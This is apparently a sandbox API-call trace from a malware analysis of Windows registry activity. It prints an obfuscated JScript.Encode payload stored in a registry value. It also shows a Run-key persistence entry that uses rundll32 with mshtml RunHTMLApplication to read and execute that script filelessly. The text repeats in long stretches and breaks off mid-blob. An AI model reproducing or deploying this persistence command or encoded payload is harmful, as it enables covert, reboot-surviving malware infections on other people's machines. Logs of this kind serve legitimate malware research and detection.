1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0122.270] RegCloseKey (hKey=0x240) returned 0x0 [0122.270] Sleep (dwMilliseconds=0x1388) [0127.278] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0xafbc4, lpdwDisposition=0x0 | out: phkResult=0xafbc4*=0x248, lpdwDisposition=0x0) returned 0x0 [0127.278] NtSetValueKey (in: KeyHandle=0x248, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0127.278] RegSetValueExW (in: hKey=0x248, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( 